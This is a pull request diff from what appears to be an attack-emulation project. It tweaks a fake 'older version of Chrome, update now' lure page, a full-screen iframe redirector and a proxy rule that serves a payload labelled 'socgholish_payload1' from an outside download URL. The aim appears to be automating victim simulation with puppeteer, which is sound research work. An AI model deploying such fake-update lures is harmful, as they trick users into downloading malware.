### PR TITLE
Minor change for automatic simulation on puppeteer

### DIFF
--- a/attack_mods/test1/proxy_rules/proxy_rules.json
+++ b/attack_mods/test1/proxy_rules/proxy_rules.json
@@ -68,7 +68,7 @@
                 "name": "download",
                 "valid_from": null,
                 "valid_to": null,
-                "url": "https://uface.eu/download",
+                "url": "http://uface.eu/download",
                 "identifier": "socgholish_payload1"
             }
         ]

--- a/attack_mods/test1/src/iframe_redirector.js
+++ b/attack_mods/test1/src/iframe_redirector.js
@@ -5,6 +5,7 @@
         frame.height = window.innerHeight;
         frame.className = 'fullScreen';
         frame.setAttribute("src", "https://placeholder.xyz.net/download.html");
+        frame.setAttribute("name", "download");
         let newbody = window.document.createElement('body');
         newbody.append(frame);
         setTimeout(() => {

--- a/attack_mods/test1/src/index.html
+++ b/attack_mods/test1/src/index.html
@@ -32,7 +32,7 @@
 		<script>
 			function download() {
 				var link = document.createElement('a');
-			    link.href = "https://uface.eu/download";
+			    link.href = "http://uface.eu/download";
 			    link.download="";
 			    link.click();
 			}
@@ -46,7 +46,7 @@
 			<h1>You are using an older version of Chrome</h1>
 			<h2>Update now to keep your Chrome browser running smoothly and securely.</h2>
 			<h2>Your download will begin automatically. If not, click here:</h2>
-			<button onclick="download()"></button>
+			<button id="download" onclick="download()"></button>
 		</center>
 		
 	</body>


### PR DESCRIPTION
To reduce the steps need to be manually done when simulating victim's
behavior, the url to download update.zip is changed without tls support.